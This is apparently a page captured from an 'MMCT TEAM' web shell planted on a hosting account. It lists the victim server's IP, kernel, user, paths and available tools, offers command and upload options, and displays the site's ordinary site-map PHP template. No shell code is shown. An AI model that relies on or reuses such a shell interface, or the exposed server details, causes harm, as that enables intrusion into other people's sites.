MMCT TEAM
Server IP : 103.53.40.154  /  Your IP : 3.138.175.10
Web Server : Apache
System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : ppcad7no ( 715)
PHP Version : 8.2.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home2/ppcad7no/ppcadsexpert.com/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/ppcad7no/ppcadsexpert.com/site-map.php
<?php include("site-header.php"); ?>
            <section>
                <div class="w-100 pt-60 position-relative">
                    <div class="fixed-bg" style="background-image: url(<?=$site_url?>/assets/images/bg10.jpg);"></div>
                    <div class="container">
                        <div class="page-title-wrap text-center w-100 d-inline-block">
                            <div class="page-title-inner d-inline-block">
                                <h2 class="mb-0 text-color7">Site Map</h2>
                              
                            </div>
                            <div class="breadcrumbs-wrap w-100">
                                <ul class="breadcrumbs mb-0 list-unstyled d-inline-flex">
                                    <li><a href="<?=$site_url?>" title="Home">Home</a></li>
                                    <li class="active">Site Map</li>
                                </ul><!-- Breadcrumbs -->
                            </div>
                        </div><!-- Page Title Wrap -->
                    </div>
                </div>
            </section>
            
                  <section>
              <div class="w-100 pt-40 pb-100 position-relative">
                    <div class="container">
                        <div class="footer-wrap d-flex flex-wrap w-100">
                         
                            <div class="footer-widget-wrap">
                                <div class="row">
                                    <div class="col-md-6 col-sm-6 col-lg-3">
                                        <div class="widget w-100">
                                            <h4>Quick Links</h4>
                                            <ul class="mb-0 list-unstyled">
<?php
$link_sql_footer=db_query("select * from tbl_site_pages where 1 and site_pages_status='Active'  order by site_pages_order_by asc ");
while($link_data_footer=mysqli_fetch_array($link_sql_footer)){
    ?>
<li><a href="<?=$site_url?>/<?=$link_data_footer['site_pages_link']?>.html"><i class="fa fa-angle-right"></i> <?=$link_data_footer['site_pages_name']?></a></li>
<?}?>

     
                                            </ul>
                                        </div>
                                    </div>
                                    <div class="col-md-6 col-sm-6 col-lg-3">
                                        <div class="widget w-100">
                                            <h4>PPC Ads Services</h4>
                                            <ul class="mb-0 list-unstyled">
<?php
$cat_sql=db_query("select * from  tbl_category where category_status='Active' and category_parent_id=0 order by category_order_by asc");
while($cat_res=mysqli_fetch_array($cat_sql))
{?>
<?php
if($loca_id!="")
{?>
<li><a href="<?=$site_url?>/<?=$loca_url?>/<?=$cat_res['category_url']?>.html" title="<?=$cat_res['category_name']?>"><i class="fa fa-angle-right"></i> <?=$cat_res['category_name']?></a></li>
<?}else{?>
<li><a href="<?=$site_url?>/<?=$cat_res['category_url']?>.html" title="<?=$cat_res['category_name']?>"><i class="fa fa-angle-right"></i> <?=$cat_res['category_name']?></a></li>
<?}?>

<?}?>
                                              

                                            </ul>
                                        </div>
                                    </div>
<div class="col-md-12 col-sm-12 col-lg-6">
<div class="widget w-100">
<h4 >Service Areas</h4>
<ul class="mb-0 list-unstyled">
<?php
$loc_sql=db_query("select * from tbl_location where location_status='Active' and location_parent_id=0 order by location_name asc");
while($loc_res=mysqli_fetch_array($loc_sql))
{?>
<li><a href="<?=$site_url?>/<?=$loc_res['location_url']?>/" title="<?=$loc_res['location_name']?>"><i class="fa fa-angle-right"></i> <?=$loc_res['location_name']?></a>

<ul>
<?php
$cat_sql=db_query("select * from  tbl_category where category_status='Active' and category_parent_id=0 order by category_order_by asc");
while($cat_res=mysqli_fetch_array($cat_sql))
{?>
<li><a href="<?=$site_url?>/<?=$loc_res['location_url']?>/<?=$cat_res['category_url']?>.html" title="<?=$cat_res['category_name']?> In <?=$loc_res['location_name']?>"><?=$cat_res['category_name']?> In <?=$loc_res['location_name']?></a></li>
<?}?>
<?php
$loc_sql1=db_query("select * from tbl_location where location_status='Active' and location_parent_id='$loc_res[location_id]' order by location_name asc");
if(mysqli_num_rows($loc_sql1)>0)
{
?>

<li>
    <a><strong>Service Areas In <?=$loc_res['location_name']?></strong></a>
    
    <?php
while($loc_res1=mysqli_fetch_array($loc_sql1))
{
?>
<ul>
  <li><a href="<?=$site_url?>/<?=$loc_res1['location_url']?>/" title="<?=$loc_res1['location_name']?>"><?=$loc_res1['location_name']?></a>
  
  <ul>
<?php
$cat_sql1=db_query("select * from  tbl_category where category_status='Active' and category_parent_id=0 order by category_order_by asc");
while($cat_res1=mysqli_fetch_array($cat_sql1))
{?>
<li><a href="<?=$site_url?>/<?=$loc_res1['location_url']?>/<?=$cat_res1['category_url']?>.html" title="<?=$cat_res1['category_name']?> In <?=$loc_res1['location_name']?>"><?=$cat_res1['category_name']?> In <?=$loc_res1['location_name']?></a></li>
<?}?>
</ul>


  </li>
</ul>
<?}?>

</li>
<?}?>

</ul>




</li>
<?}?>
</ul>
</div>
</div>
                                    
                                </div>
                            </div>
                        </div><!-- Footer Wrap -->
                        
                    </div>
                </div>
            </section>
   
   
            
            
          
            
           <?php include("site-footer.php"); ?>
           

MMCT - 2023